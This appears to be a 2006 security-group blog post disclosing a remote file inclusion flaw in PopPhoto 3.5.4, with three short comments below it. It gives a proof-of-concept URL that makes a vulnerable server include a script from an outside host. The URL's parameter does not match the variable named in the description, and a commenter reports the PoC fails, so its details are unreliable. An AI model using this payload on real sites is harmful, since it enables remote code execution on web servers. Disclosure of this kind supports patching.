by r0t,der4444,cembo,VietMafia

Sunday, May 14, 2006

PopPhoto - Remote File Inclusion Vuln

PopPhoto - Remote File Inclusion Vuln

=================================
script: PopPhoto 3.5.4 and below
risk: critical
status: unpatched
discovered by: VietMafia
=================================

Vuln. Description:

This flaw is due to an input validation error in the "resources/includes/popp.config.loader.inc.php"(line 25) that does not validate the "cfg['popphoto_base_path']" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

PoC:

http://[target]/[path]/resources/includes/popp.config.loader.inc.php?
include_path=http://unsecured-systems.com/forum/

sorry all, i 'm still on travelling so i dont have much time to contribute :) i will be back very soon.

3 Comments:

Blogger r0t told...

No probz bro,im also still enjoyin my holyidays...

4:32 AM

 
Anonymous alfanso told...

poc isnt working..........:O

8:56 AM

 
Blogger VietMafia told...

lol, you have to use the PoC wisely mate

4:02 PM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew